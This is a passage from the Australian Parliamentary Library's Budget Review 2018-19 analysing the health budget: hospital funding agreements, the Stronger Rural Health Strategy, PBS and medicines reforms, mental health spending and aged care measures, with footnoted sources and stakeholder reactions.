8 May 2018. 488. Australian Healthcare and Hospitals Association (AHHA) ‘Health data boost right step on the road to reform’, media release, 8 May 2018. 489. Consumers Health Forum (CHF), ‘Health budget includes welcome consumer focus’, media release, 8 May 2018. 490. Australian Diagnostic Imaging Association, ‘Budget: Government is “miles short” on Medicare’, media release, 8 May 2018. 491. L Buckmaster, op. cit.
Budget Review 2018-19 88
Hospital funding All but two states (Victoria and Queensland) have signed up to a new five-year public hospital funding agreement from 2020-21.492 Under the agreement, the Government has committed to providing $130.2 billion over five years from 2020-21, based on funding 45 per cent of the efficient growth in hospital activity, with total funding growth capped at 6.5 per cent a year.493 These parameters are the same as those operating under the current agreement. Estimated allocations to individual states and territories to 2021-22 are provided in the Budget,494’.495 The Fund is conditional on all states and territories signing the
hospital funding agreement.496
In addition to funding for public hospital activities, the Budget includes $188.9 million to support the expansion of the Joondalup Health Campus and Osborne Parks Hospital, and refurbishment of Royal Perth Hospital.497 The funding is being provided in the form of a GST top-up payment to Western Australia for 2017-18.498
Stakeholder reaction’.499 The Australian Medical Association has argued that ‘more [hospital] funding will be needed over the long term’.500.501
492. G Hunt (Minister for Health), ‘Northern Territory and Tasmania sign onto record hospital funding agreement’, media release, 23 April 2018. 493. Budget measures: budget paper no. 2: 2018-19, p. 126. 494. Australian Government, Federal financial relations: budget paper no. 3: 2018-19, p. 15. 495. Budget measures: budget paper no. 2: 2018-19, p. 126. 496. DoH, ‘Record Hospital Investment - National Health Agreement 2020-21 to 2024-25’, Budget 2018-19 Fact Sheet, 8 May
2018.
497. Federal financial relations: budget paper no. 3: 2018-19, p. 23. 498. Budget measures: budget paper no. 2: 2018-19, p. 144. 499. CHF, op. cit. 500. Australian Medical Association (AMA), ‘Safe and steady health budget, but bigger reforms are still to come’, media release,
9 May 2018. 501. J Hennessy (Victorian Minister for Health), ‘Patients suffer as Turnbull gives big business a tax cut’, media release, 8 May 2018.
Budget Review 2018-19 89
Rural health workforce Amanda Biggs
A Stronger Rural Health Strategy It is widely recognised that people in rural and remote areas of Australia experience poorer health outcomes, lower life expectancy and poorer access to health services than those living in metropolitan areas.502 To address shortages of health workers in rural and remote areas, the Government has announced A Stronger Rural Health Strategy package and allocated funding of $83.3 million over five years from 2017-18.503 The Government says the Strategy will deliver around an additional 3,000 specialist general practitioners (GPs) and over 3,000 nurses, as well as hundreds of allied health professionals in rural areas over ten years, for a total investment of $550 million.504 However, it is not clear from the budget papers what specific measures count towards this total investment figure.
Rural medical workforce A range of measures for the medical workforce are included in the package.
A Murray-Darling Medical Schools Network supporting end-to-end training for students to study medicine in the regions will be established. The network will involve seven university medical schools (subject to finalisation of contractual arrangements and the universities meeting accreditation requirements).505 A pool of Commonwealth Supported Places (CSPs) taken from
existing medical school allocations will be established. Commencing in 2021, the pool will comprise up to 60 medical CSPs to be allocated by participating universities every three years and redistributed between providers through a competitive process. This will provide flexibility to allow rural health workforce priorities to be more quickly addressed as they emerge. These priorities will be identified through a new health workforce data tool called HeaDS UPP.506
Thirty CSPs will be allocated in the first round to a new medical school in Orange. Universities with reduced medical CSPs will be allowed a commensurate increase to their international medical enrolments, as a transitional arrangement. $95.4 million has been earmarked to establish the network. However, no new CSPs will be funded.507 Legislation is not required; however, the establishment of the network and pool arrangements may need to be specified in the triennial Commonwealth Grants Scheme funding agreements between the participating universities and the Commonwealth.508
To enhance training opportunities in rural areas, two new Junior Doctor Training programs will be introduced. The Rural Primary Care Stream will provide educational support for junior doctors to train in rural general practice. The Private Hospital Stream will provide salary support for junior doctors to work in private hospitals. Concurrent to this will be the development by the National Rural Health Commissioner of a National Rural Generalist pathway.509 Legislation is not required.
502. Australian Institute of Health and Welfare (AIHW), ‘Rural & remote Australians: overview’, AIHW website. 503. Australian Government, Budget measures: budget paper no. 2: 2018-19, pp. 106-107. 504. Department of Health (DoH), ‘Stronger Rural Health Strategy-delivering high quality care’, Budget 2018-19 Fact Sheet, 8 May 2018.
505. The universities involved include the University of NSW (Wagga Wagga), University of Sydney (Dubbo), Charles Sturt University/Western Sydney University (Orange), Monash University (Bendigo, Mildura), University of Melbourne/La Trobe University (Shepparton, Bendigo, Wodonga). 506. DoH, ‘Stronger Rural Health - Teaching - Train in the regions, stay in the regions’, Budget 2018-19 Fact Sheet, 8 May 2018. 507. Ibid. 508. Department of Education, ‘Commonwealth Grants Scheme’, website. The agreements are made under the Higher Education
Support Act 2003. 509. DoH, ‘Stronger Rural Health -Training-improving access to training in rural areas and the private sector through junior doctor training’, Budget 2018-19 Fact Sheet, 8 May 2018.
Budget Review 2018-19 90
New fee arrangements that support medical graduates to pursue additional qualifications as vocationally registered (VR) general practitioners (GPs) will be introduced.510 Australian trained non-VR doctors who work in Modified Monash Model (MMM)511 remoteness classification areas 2-7 will be able to claim 80 per cent of the Medicare rebate that is claimable by VR GPs, representing an increase on the Medicare rebate they can currently claim. Support will be offered to existing non-VR GPs to upgrade their qualifications. When a new non-VR GP begins the pathway to full registration (Fellowship) they will be able to claim the full Medicare rebate.512 It is hoped that supporting non-VR GPs to attain higher qualifications in rural areas will help address the maldistribution of the medical workforce in these areas. Legislation will not be required, as changes to Medicare fees are made through legislative instrument.513
At the same time under a separate Home Affairs budget measure, the number of visas for overseas trained doctors (OTDs), who provide a significant proportion of Medicare-funded services in rural areas, will be capped at 2,100 per year from January 2019.514 Although not detailed in the budget papers, media reports suggest this will result in a decrease of 200 OTDs per year.515 As the pool of new OTD doctors declines, Medicare expenses in the form of rebates that are paid to them should also fall, resulting in estimated savings of $415.5 million over four years.516 Savings will be used to fund health policy priorities.517 Imposing a cap on OTDs does not require legislation.
The geographic eligibility criteria for rural bulk billing incentives will be updated. Incentives are available to doctors in designated rural and remote areas for bulk billing patients under 16 or those holding a Commonwealth concession card. The geographic eligibility criteria that are currently applied are based on out-dated population figures; these will be updated and be based on the MMM remoteness classification areas 2-7.518 Legislation will not be required as the changes can be achieved through legislative instrument.
Other medical workforce measures include:
⢠changing the return of service obligations for medical students under bonded medical training programs by introducing an optional three year bonded period (down from six years)519 and
⢠streamlining GP training arrangements provided through the Royal Australian College of General Practitioners and the Australian College of Rural and Remote Medicine for GPs to gain
510. VR GPs complete a three year training program that allows them to pursue a career as a specialist general practitioner. Royal Australian College of GPs, ‘Becoming a GP in Australia,’ webpage. 511. The Modified Monash Model (MMM) is a new geographical classification system, using up-to-date population data, which the Government is using to address the maldistribution of medical services across Australia. DoH, ‘Modified Monash Model’,
webpage. A searchable map of MMM locations is available via this DoctorConnect website. 512. DoH, ‘Stronger Rural Health - Training - improved access to Australian trained general practitioners and quality care’, Budget 2018-19 Fact Sheet, 8 May 2018. Currently, rebates for non-VR GPs are considerably lower than for VR GPs. 513. Health Insurance (General Medical Services Table) Regulations 2017. 514. Budget measures: budget paper no. 2: 2018-19, p. 134. 515. ‘Australia to let in fewer overseas doctors, in one of biggest budget savings’, The Guardian (Australia), 8 May 2018; S Parnell,
‘Junior medics’ reason to go bush’, The Australian, 9 May 2018. 516. OTDs who work in a District of Workforce Shortage are exempt from the Section 19AB restrictions of the Health Insurance Act 1973, which prohibits OTDs from accessing a Medicare provider number. See Department of Human Services (DHS),
‘Medicare provider number for overseas trained doctors and foreign graduates’, DHS website. The difference between the Medicare rebate for exempt OTDs and the 80% of the fee that non-VR GPs will be able to claim appears to constitute most of the savings. 517. Budget measures: budget paper no. 2: 2018-19, p. 134. This measure constitutes the largest saving in this year’s budget. See Australian Government, Budget Overview, p. 36. 518. DoH, ‘Stronger Rural Health—Recruitment and retention—supporting rural and remote areas through improved targeting of rural bulk billing incentives’, Budget 2018-19 Fact Sheet, 8 May 2018. 519. DoH, ‘Stronger Rural Health —Recruitment and retention—addressing doctor shortages across rural and remote areas by strengthening bonded program ’, Budget 2018-19 Fact Sheet, 8 May 2018.
Budget Review 2018-19 91
vocational recognition and providing 100 additional vocational training places through the Australian General Practice Training Program from 1 January 2021.520
Nursing and allied health workforce The package includes a number of measures to support the nursing and allied health workforces, in recognition that rural areas also experience shortages of these health professionals.
A new Workforce Incentive Program will be established from 1 July 2019, which will provide targeted incentives for general practices to employ allied health professionals and targeted incentives for doctors to practise in non-metropolitan areas. Existing GP, nursing and allied health incentive programs will be replaced with the new Workforce Incentive Program. Eligible practices who employ allied health professionals can receive incentive payments up to $125,000 per year, with a rural loading for those in MMM classification areas 3-7. Doctors located in MMM classification areas 3-7 areas may receive a maximum payment of up to $60,000. Around 5,000 practices and more than 7,000 doctors are expected to be eligible for the payments.521
The role of nursing in team-based and multidisciplinary primary care service settings will be enhanced through continued funding to the Australian Primary Health Care Nurses Association, which helps nurses to deliver care in primary care settings. An independent review of the nursing curricula and pathways into nursing will be conducted.522
Support for Aboriginal and Torres Strait Islander health professional organisations will continue through increasing investment in Aboriginal and Torres Strait Islander Health Professional Organisations of around $1.6 million a year. In addition, a new primary care funding model will be implemented from 1 July 2019, in consultation with the Indigenous health sector.523
Stakeholder reaction Most stakeholders have been generally supportive of the package. The Rural Doctors Association of Australia (RDAA) and the National Rural Health Alliance (NHRA) both welcomed the Strategy. The RDAA described it as ‘a multi-pronged approach to supporting improved medical workforce distribution to rural and remote Australia’.524 The NHRA welcomed funding ‘to help fill the health workforce gaps’ and described the new Workforce Incentive Program as the ‘first step in increasing very low numbers of allied health workers in rural and remote areas’.525 The Australian Medical Association (AMA) also welcomed the Strategy.526
For several years, there have been calls including from some in the National Party, to establish a Murray Darling Basin Medical School.527 These calls have faced opposition from some medical groups, including the AMA, who argue that there is an oversupply of medical graduates528 and the Australian Medical Students Association (AMSA) who argued that increasing the number of
520. DoH, ‘Stronger Rural Health—Training—streamlining general practice training to produce Australian trained general practitioners where they are needed’, Budget 2018-19 Fact Sheet, 8 May 2018. See also, Budget measures: budget paper no. 2: 2018-19, p. 107.
521. DoH, ‘Stronger Rural Health—Recruitment and retention—Workforce Incentive Program’, Budget 2018-19 Fact Sheet, 8 May 2018. 522. DoH, ‘Stronger Rural Health—Recruitment and retentions—strengthening the role of the nursing workforce’, Budget 2018-19 Fact Sheet, 8 May 2018. 523. M McCormack (Deputy Prime Minister) and J McVeigh (Minister for Regional Development, Territories and Local
Government), Regional Australia—A stronger economy delivering stronger regions, ministerial budget statement, 2018, p. 92. 524. Rural Doctors Association of Australia (RDAA), ‘Budget delivers for rural health’, media release, 8 May 2018. 525. National Rural Health Alliance, ‘Rural health budget $$ welcome but not enough’, media release, 8 May 2018. 526. Australian Medical Association (AMA), ‘AMA welcomes 'Stronger Rural Health Strategy'’, media release, 9 May 2018. 527. J Dewar, ‘Regional unis face ‘triple whammy’’, The Australian, 24 May 2017; ‘Regional taxation key to growth’, Central
Western Daily, 30 June 2016. 528. S Parnell, ‘More doctors not the answer’, The Australian, 4 May 2018.
Budget Review 2018-19 92
medical graduates would mean a higher number missing out on limited internship placements.529 In announcing the Murray-Darling medical schools network, the Government appears to have addressed some of these concerns by agreeing to not increase the total number of medical CSPs available overall. The AMA described the decision to ‘reject the proposal for a stand-alone Murray Darling Medical School in favour of network’ as ‘a better approach’.530 The AMSA Rural Health group also expressed ‘cautious optimism’ over the announcement.531
In relation to the visa changes for OTDs, Dr Michael Gannon, President of the AMA has reportedly questioned whether the savings will be achievable, as other medical providers will still be available to provide the services no longer provided by OTDs.532
529. Ibid. 530. AMA, ‘AMA welcomes 'stronger rural health strategy'’, op. cit. 531. AMSA Rural Health, ‘Budget: rural health in focus’, media release, 10 May 2018. 532. N Evans, ‘Visa saving questioned by doctors’, West Australian, 10 May 2018.
Budget Review 2018-19 93
Medicines Alex Grove
The Budget provides funding for new medicines and vaccines, while continuing to control overall expenditure on the Pharmaceutical Benefits Scheme (PBS). Reforms to the way the Government pays for high cost medicines do not directly affect consumers, but do have implications for the pharmaceutical supply chain, including pharmaceutical companies, wholesalers and pharmacists.
Pharmaceutical Benefits Scheme The Australian Government subsidises the cost of many medicines through the PBS.533 The Budget contains changes to the way the Government pays for certain high cost medicines on the PBS. Under the current system, the Government may enter into special price arrangements for the listing of a PBS medicine through a deed of agreement. This allows the published PBS price (which can affect international markets) to be higher than the actual price of the medicine to the Government. The pharmaceutical company funds the difference between the published price and the ‘cost-effective price’ through a confidential rebate which is paid to the Government in arrears.534 Rebates have been growing in recent years. In 2016-17 the Department of Health (DoH) received $3.27 billion in ‘PBS drug recoveries’, much of which related to rebates paid for new medicines to treat Hepatitis C.535
The Government has negotiated with individual pharmaceutical companies to reduce the published PBS price of some high cost medicines from 1 July 2018, with a corresponding decrease in the rebate to be repaid by the companies. The Government will also implement an ‘improved payment administration trial’ for some high cost medicines from 1 July 2019.536 The design of the trial is still being negotiated, but the intent is to pay pharmaceutical companies the cost-effective price of the medicine, while continuing to remunerate wholesalers and pharmacists based on the published price.537 These changes to the remuneration of the PBS supply chain may make it easier for pharmacists to stock high cost medicines.538 They may require legislation.
As part of the same budget measure, the Government has set aside $1.0 billion over the forward estimates to pay for medicines which have not yet been listed on the PBS.539 Including both the changes to rebates and the $1.0 billion that has been set aside, the overall measure is budget neutral because government upfront expenditure on the PBS will reduce, but revenue from rebates will also fall. When the $1.0 billion is included, overall PBS investment (expenditure minus rebates) is forecast to grow slightly in nominal terms to 2021-22, but to decline in real terms by 7.3 per cent.540
New medicines are listed each month on the PBS, following a positive recommendation from the Pharmaceutical Benefits Advisory Committee and pricing negotiations with DoH.541 The Budget provides $1.4 billion (less confidential rebates) over five years from 2017-18 for new and
533. Department of Health (DoH), ‘About the PBS’, Pharmaceutical Benefits Scheme (PBS) website, last updated 1 January 2018. 534. ‘Government pushing on with rebate change but implementation the challenge’, PharmaDispatch.com, 27 February 2018. 535. DoH, Annual report 2016-17, pp. 291, 302. 536. The budget figures in this brief have been taken from the following document unless otherwise sourced: Australian
Government, Budget measures: budget paper no. 2: 2018-19, pp. 112-120. 537. DoH, ’PBS news: Changes to PBS payment arrangements for certain medicines’, PBS website, last updated 3 May 2018. 538. G Hunt (Minister for Health), Speech to the APP Conference, Gold Coast, speech, 3 May 2018. 539. Provision for future increases in new medicine listings is made in the Contingency Reserve, but in this Budget such expenses
have been allocated to the pharmaceutical benefits and services sub-function. See Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, pp. 6-20, 6-21, 6-44. 540. Ibid., pp. 6-21, 6-22. 541. A Grove, The Pharmaceutical Benefits Scheme: a quick guide, Research paper series, 2015-16, Parliamentary Library, Canberra, 2016.
Budget Review 2018-19 94
amended listings on the PBS. This includes medicines to treat cancers, multiple sclerosis and spinal muscular atrophy (SMA, a form of motor neuron disease), as well as a medicine to prevent HIV/AIDS.
The Budget contains measures to encourage appropriate use of medicines and increased prescribing of generic and biosimilar medicines. This includes $28.2 million over five years from 2017-18 to upgrade doctors’ prescribing software, including an option for electronic rather than paper PBS prescriptions.542 There is also $5.0 million over three years from 2017-18 to continue a campaign to encourage prescribing of generic and biosimilar medicines (which are often cheaper than their brand name equivalents). This will include changes to doctors’ prescribing software to allow medicine ingredient name prescribing by default, without preventing doctors from prescribing by brand name.543 Increased uptake of these medicines is expected to reduce PBS spending by $335.8 million over five years from 2017-18. The Government will also target prescribers with education activities to encourage appropriate use of certain medicines, and blood and blood products for an expected saving of $77.6 million over five years from 2017-18.
Life Saving Drugs Program The Life Saving Drugs Program (LSDP) funds expensive medicines for rare and life threatening diseases. It is not part of the PBS. The Government responded to the Post-market Review of the Life Saving Drugs Program in January 2018.544 The Government announced it would retain and improve the LSDP (despite the review recommending that it should transition to the PBS), and apply pricing policies such as statutory price reductions (which currently apply to PBS medicines) to LSDP medicines.545
The Budget includes $5.4 million over five years (already provided for in forward estimates) from 2017-18 to implement improvements to the administration of the LSDP. The Government has reached an agreement with Medicines Australia (MA) on behalf of pharmaceutical companies to implement PBS-like pricing policies for the LDSP. This is likely to result in savings, but the financial impact is not published in the Budget as it is commercial-in-confidence.
Immunisation The National Immunisation Program (NIP) is a series of free immunisations given at specified ages or to people in specified risk groups.546 The Budget provides $42.5 million over five years from 2017-18 to list whooping cough vaccines for pregnant women, high dose influenza vaccines for people aged 65 or over and a vaccine for children aged 12 months to protect against meningococcal A,C,W and Y.
Stakeholder reaction Reaction to the budget measures has been largely positive, apart from concerns about the overall level of funding for the PBS.
MA has welcomed funding for the listing of new PBS medicines, and will continue to negotiate regarding the payment trial for high cost medicines.547 The Generic and Biosimilar Medicines
542. DoH, Improving access to medicines - ePrescribing for safer medicines, Budget 2018-19 fact sheet, DoH, 8 May 2018. 543. DoH, Improving access to medicines - encouraging greater use of generic and biosimilar medicines, Budget 2018-19 fact sheet, DoH, 8 May 2018. 544. DoH, Post-market review of the Life Saving Drugs Programme: June 2014-June 2015, report to the Australian Government,
2018; Australian Government, Australian Government response to the post-market review of the Life Saving Drugs Program, 2018. 545. Ibid. 546. DoH, ‘National Immunisation Program schedule’, DoH website, last updated 8 December 2017. 547. Medicines Australia, Government commits to PBS, time to unpack the detail, media release, 8 May 2018.
Budget Review 2018-19 95
Association (GBMA) has welcomed prescribing and other measures to encourage uptake of generic and biosimilar medicines, as well as funding for new PBS listings and the LSDP.548 Pharmaceutical industry media publication PharmaDispatch has taken a more negative view, questioning why PBS funding is declining in real terms over the forward estimates when funding for other health programs is growing.549
The Pharmacy Guild of Australia, representing pharmacy owners, has welcomed changes to rebates to the extent that they reduce cash flow pressures on pharmacies. In negotiating the terms of the trial, the Guild states it will insist on automated arrangements for pharmacies and no reduction in dispensing related remuneration.550
The Consumers Health Forum of Australia has welcomed budget measures promoting infant and maternal health, including the listing of a medicine to treat SMA in infants and whooping cough immunisations for pregnant women.551
548. Generic and Biosimilar Medicines Association, Commitment to affordable healthcare, media release, 9 May 2018. 549. ‘Why is the PBS being starved of funding?’, PharmaDispatch.com, 10 May 2018. 550. Pharmacy Guild of Australia, ‘The PBS - now more than ever the most sustainable part of the health system’, Forefront, 8(9), 8 May 2018.
551. Consumers Health Forum of Australia, Health budget includes welcome consumer focus, media release, 8 May 2018.
Budget Review 2018-19 96
Mental health Lauren Cook
Mental health reform is a key component of the Australian Government’s ‘long term health plan’.552
In previous years, the Australian Government has been criticised for mental health being ‘chronically underfunded’,553 with some stakeholders claiming that the mental health budget is ‘really half of what it should get’.554 Stakeholders have also criticised previous funding allocations, suggesting that the Government should ‘reorient investment towards early intervention and prevention’.555
The Government has committed an additional $338.1 million in the Budget for mental health, with a particular focus on suicide prevention, supporting older Australians, and mental health research.556 This investment is nearly double the commitments to mental health made in the
2017-18 Budget.557
It is unlikely that the measures outlined below will require legislation.
Suicide prevention The Government has committed $72.6 million in the Budget for suicide prevention initiatives. This includes $37.6 million over four years to beyondblue and Primary Health Networks to improve follow-up care for people discharged from hospital following a suicide attempt,558 $33.8 million over four years to Lifeline Australia to enhance its telephone crisis services, and $1.2 million in 2018-19 to SANE Australia to deliver a targeted suicide awareness campaign.
Prior to the Budget, stakeholders advised the Government to invest in intensive follow up treatment after suicide attempts. In its pre-budget submission, Mental Health Australia stated that a previous suicide attempt was the most reliable predictor of a subsequent death by suicide, with half of the people discharged from hospital after a suicide attempt not attending follow-up treatment.559
This funding has been welcomed by stakeholders, with the Chair of beyondblue, Julia Gillard, commending the Minister for Health for his ‘commitment to reducing Australia’s suicide rate’.560
Older Australians As part of the Government’s ‘More Choices for a Long Life’ package, the Government has committed a total of $102.5 million over four years from 2018-19 to improve access to psychological services for older Australians. This includes $82.5 million in funding for mental health services for people in residential aged care facilities, and $20.0 million for the development
552. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.9: Health Portfolio, p. 21. 553. S Rosenberg, ‘Mental health funding in the 2017 budget is too little, unfair and lacks a coherent strategy’, The Conversation, 11 May 2017. 554. K Gregory, ‘Australia lagging on funding for mental health services, says Mental Illness Fellowship’, ABC News, 11 May 2015. 555. Mental Health Australia (MHA), Mental health sector unites to highlight shortcomings in Fifth National Mental Health Plan,
media release, 20 December 2016. 556. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.9: Health Portfolio, p. 16. 557. Australian Government, Portfolio budget statements 2017-18: budget related paper no. 1.10: Health Portfolio, pp. 17-18. 558. $27.1 million of this commitment is for Primary Health Networks for the commission of services, and is contingent on co-
contributions from state and territory governments. The budget figures in this brief have been taken from the following document unless otherwise sourced : Australian Government, Budget measures: budget paper no. 2: 2018-19, pp. 106-126. 559. MHA, Mental Health Australia 2018/19 pre-budget submission, MHA, 7 March 2018, p. 12. 560. beyondblue, beyondblue welcomes suicide prevention funding announcement, media release, 8 May 2018.
Budget Review 2018-19 97
of a program to target the mental health of older Australians in the community, particularly those at risk from isolation.
In 2012, just over half of all permanent aged care residents had symptoms of depression.561 Further, in 2016, men over 85 had the highest rate of suicide in Australia.562 Despite this, older Australians in residential care are not eligible for Medicare subsidised psychological treatment through the GP Mental Health Treatment Plan.563 While it appears that the measure was introduced to address this gap, it is unclear whether changes will be made to the eligibility criteria for the GP Mental Health Treatment Plan, or if the measure will address this gap in other ways.
Stakeholders have overwhelmingly supported this measure, as older Australians in residential aged care facilities have previously ‘not had adequate access to mental health care, and been left unsupported when dealing with conditions like depression and dementia’.564
Mental health research The Government announced a distribution of $125.0 million from the Medical Research Future Fund over 10 years from 2017-18 for Million Minds Mental Health Research Mission (the Million Minds Mission). The Million Minds Mission will look at prevention, new diagnoses, and new treatment for mental health to support priorities under the Fifth Mental Health and Suicide Prevention Plan, with a particular focus on clinical trials.565
Stakeholders have supported the investment in health and medical research in the Budget, with Mental Health Australia commending the ‘welcome shift to investment on a 10 year horizon’.566
Other mental health measures
Royal Flying Doctor Service The Government has committed $84.1 million to the Royal Flying Doctor Service, to improve the delivery and availability of dental, mental health and emergency services to Australia’s rural and remote communities. This includes a new Mental Health Outreach Clinic, which will provide professional mental health services from 1 January 2019.567 This funding has been welcomed by stakeholders, with the CEO of the National Mental Health Commission commending it for being a ‘much needed boost’.568
National Mental Health Commission The Government announced an additional $12.4 million over four years from 2018-19 for the National Mental Health Commission to oversee mental health reform and implement the Fifth National Mental health and Suicide Prevention Plan.569 This funding was welcomed by
561. Australian Institute of Health and Welfare (AIHW), Australia’s welfare 2015, AIHW, Canberra, 2015, p. 278. 562. Australian Bureau of Statistics (ABS), Causes of Death, Australia, 2016, cat. no. 3303.0, ABS, Canberra, 2017. 563. Senate Community Affairs Committee, Answers to Questions on Notice, Health Portfolio, Additional Estimates 2016-17, 1 March 2017, Question SQ17-000283.
564. Australian Psychological Society, Budget: investments in mental health and aged care welcome, media release, 9 May 2018; Australian College of Nursing, Australian Government health budget 2018-19, media release, 8 May 2018; MHA, Mental Health Australia welcomes new mental health investments, media release, 9 May 2018.
565. G Hunt (Minister for Health), Transcript of interview with Laura Jayes on Sky News Live, media release, 6 March 2018. 566. MHA, Mental Health Australia welcomes new mental health investments, op. cit. 567. M McCormack (Deputy Prime Minister) and J McVeigh (Minister for Regional Development, Territories and Local Government), Regional Australia—A stronger economy delivering stronger regions 2018-19, ministerial budget statement,
2018, p. 92. 568. National Mental Health Commission, Federal budget makes the mental health of our nation a top priority, media release, 9 May 2018. 569. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.9: Health Portfolio, p. 22.
Budget Review 2018-19 98
stakeholders, particularly Mental Health Australia, which identified funding the implementation of the Fifth National Mental health and Suicide Prevention Plan as a key priority in its pre-Budget submission.570
Youth mental health On 8 January 2018, the Minister for Health announced $110.0 million in additional investment in child and youth mental health. This included up to $46.0 million to beyondblue for its integrated school-based Mental Health in Education initiative, $30.0 million to the headspace National Youth Mental Health Foundation to provide support to Primary Health Networks in commissioning headspace services, $16.0 million to Emerging Minds for the National Workforce Support in Child Mental Health initiative, and $13.5 million for the operation of the National Centre of Excellence in Youth Mental Health.571 However, there did not appear to be any references to this package in the Budget.
570. MHA, Mental Health Australia 2018/19 pre-budget submission, op. cit., p. 7. 571. G Hunt (Minister for Health) and B McKenzie (Minister for Rural Health), $110 million additional investment in child and youth mental health, media release, 8 January 2018.
Budget Review 2018-19 99
Aged care Alex Grove
In the 2018-19 Budget the Government has responded to two key reviews of aged care, as well as growing demand for home care packages. The response takes the form of an omnibus budget measure for ‘healthy ageing and high quality care’. This measure comprises 23 initiatives across aged care provision, consumer access to aged care, quality and regulation of aged care and healthy ageing.572 The most significant initiatives in terms of funding or policy change are briefly outlined in this article.
The Department of Health notes an additional $5.0 billion over five years for ageing and aged care.573 Overall spending on aged care services is forecast to grow from $18.0 billion in 2018-19 to $22.1 billion in 2021-22, largely reflecting demographic factors.574 However, the overall impact of the omnibus measure on the Budget appears broadly neutral, with a small net reduction in expenditure of $19.5 million over the forward estimates offset by a small net reduction in revenue of $18.4 million and a small increase in capital expenditure of $4.2 million. The net changes to underlying cash balance detailed in the tables are small, suggesting that the initiatives are to be funded by repurposing existing funds, but there is no information on how this is envisaged.575 It may relate to future targets for the number of home and residential care places, which are discussed further below.
Residential and home care places The Government releases residential aged care places, short-term restorative care (STRC) places (which provide up to eight weeks of care and services designed to delay or avoid admission to residential care) and capital grants to aged care providers in an annual competitive process called the Aged Care Approvals Round (ACAR).576 Home care packages (HCPs), which are coordinated packages of care to help eligible older people remain at home rather than entering residential care, are assigned directly to consumers on a regular basis through a national prioritisation system.577 As at 31 December 2017, there were 104,602 consumers waiting for an HCP, although 46 per cent of those had an interim lower level package while they were waiting for a package at their approved level.578
The Budget includes 14,000 new high-level home care packages over four years from 2018-19, as well as 13,500 residential aged care places, 775 STRC places and $60 million in capital grants to be released through the 2018-19 ACAR. This is expected to cost $1.6 billion over four years.579
The total number of aged care places grows in line with the size of the older population over 70. The Government was aiming for 45 home care places, 78 residential places and 2 STRC places per
572. Australian Government, Budget measures: budget paper no. 2: 2018-19, pp. 117-19. 573. Department of Health (DoH), Health 2018-19 Budget at a glanceâ-âkey initiatives, Budget 2018-19 fact sheet, DoH, 8 May 2018. 574. Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, pp. 6-23, 6-24. 575. Budget measures: budget paper no. 2: 2018-19, op. cit., p. 117. 576. DoH, ‘Aged Care Approvals Round (ACAR)’, Ageing and Aged Care website, last updated 9 May 2018. 577. Aged Care Financing Authority (ACFA), Fifth report on the funding and financing of the aged care sector, ACFA, July 2017,
p. 45.
578. DoH, Home Care Packages Program: data report 2 nd quarter 2017 -18: 1 October -31 December 2017, DoH, Canberra, March
2018, p. 9. Home care packages range from level 1 (basic care needs) to level 4 (high care needs), with higher level packages attracting larger Australian Government subsidies. 579. DoH, Better access to care—more high level home care packages and residential care places, Budget 2018-19 fact sheet, DoH, 8 May 2018.
Budget Review 2018-19 100
1,000 people aged 70 and over by 2021-22.580 It appears that the mix of places in this target may have changed, although this is not explicitly stated in the budget measure.
One of the initiatives in the budget measure is to ‘combine the Residential Care and Home Care programs from 1 July 2018 to provide greater flexibility to respond to changes in demand for home care packages and residential aged care places.’581 The Government has reportedly confirmed it is allocating funding not required for residential places to home care, where demand is higher.582 The 2017-18 Budget had a target of 232,300 residential places and 134,545 HCPs by 2020-21.583 The 2018-19 Budget has a revised target of 225,000 residential places (7,300 fewer places) and 144,500 HCPs (9,955 more places) by 2020-21.584
It appears the increase in HCPs has been offset by a decrease in the more expensive residential places, which may explain the budget neutrality of the overall measure. However, the Government has rejected Labor’s assertion that there is no new funding for aged care in the Budget.585
Response to the Legislated Review of Aged Care 2017 The Legislated Review of Aged Care 2017 (the Tune review) made 38 recommendations for a more consumer centred and sustainable aged care system.586 The Government rejected recommendations to include the full value of the owner’s home in the means test for residential care and to remove the annual and lifetime caps on means-tested care fees.587 This Budget responds to a number of the remaining Tune review recommendations through initiatives including:
⢠$105.7 million over four years (including $32.0 million from existing resources) to provide more aged care in remote Indigenous communities (recommendation 31)
⢠$61.7 million over two years to make the Government’s My Aged Care website easier for consumers to use (recommendation 25)
⢠$14.8 million over two years to prepare for a streamlined national assessment framework which could potentially allow people to access all types of aged care via a single assessment (recommendation 27)
⢠$7.4 million over two years to trial a range of services to help people navigate the aged care system (recommendation 23)
⢠$0.3 million for a study to assess the impact of allocating residential places to consumers rather than providers (recommendation 3) and
⢠$8.6 million over four years to improve the management of prudential risk by aged care providers, including through a compulsory levy on providers to recoup the cost of providers defaulting on the repayment of accommodation bonds to consumers (recommendations 20 and 21).588
580. ACFA, Fifth report on the funding and financing of the aged care sector, op. cit., p. xiii. 581. Budget measures: budget paper no. 2: 2018-19, op. cit., p. 118. 582. R Morton, ‘Bond levy sparks collapse fears’, The Australian, 10 May 2018, p. 10. 583. Australian Government, Portfolio budget statements 2017-18: budget related paper no. 1.10: Health Portfolio, pp. 132, 135. 584. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.9: Health Portfolio, pp. 138-39. 585. R Morton, op. cit. 586. D Tune, Legislated review of aged care 2017, DoH, 2017, pp. 12-17. 587. K Wyatt (Minister for Aged Care), 6,000 extra high need home care packages and $20 million My Aged Care revamp, media
release, 14 September 2017. 588. Budget measures: budget paper no. 2: 2018-19, op cit., pp. 117-19; Tune, Legislated Review of Aged Care 2017, op. cit., pp. 13-16.
Budget Review 2018-19 101
This last initiative would involve changes to the Accommodation Payment Guarantee Scheme, which would require legislation.589
Response to the Review of National Aged Care Regulatory Processes The Review of National Aged Care Regulatory Processes (the Carnell-Paterson review) recommended combining the Aged Care Complaints Commissioner (who handles complaints about aged care services), the Australian Aged Care Quality Agency (which accredits aged care providers and monitors compliance with standards) and the sanctioning powers of the Department of Health into a single independent Aged Care Quality and Safety Commission.590 The Budget provides $253.8 million over four years to support the functions of this new Commission, which is to be established by January 2019. The initiative is budget neutral, presumably because these activities are already funded.591 Establishing the Commission would require legislation.
The Budget addresses other recommendations of the Carnell-Paterson review through funding to make information about the quality of residential care providers more accessible to consumers (including publishing performance ratings on the My Aged Care website) and to improve the proposed Commission’s ability to identify risks to consumers and respond to care failures.592
